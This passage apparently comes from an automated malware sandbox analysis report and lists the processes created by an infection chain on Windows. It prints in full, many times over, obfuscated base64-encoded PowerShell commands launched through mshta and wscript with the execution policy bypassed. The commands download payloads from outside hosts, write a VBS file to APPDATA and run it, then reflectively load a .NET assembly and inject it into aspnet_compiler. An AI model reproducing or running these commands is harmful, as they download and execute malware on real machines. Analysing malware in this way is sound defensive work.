1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Suspicious command line found
      Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSA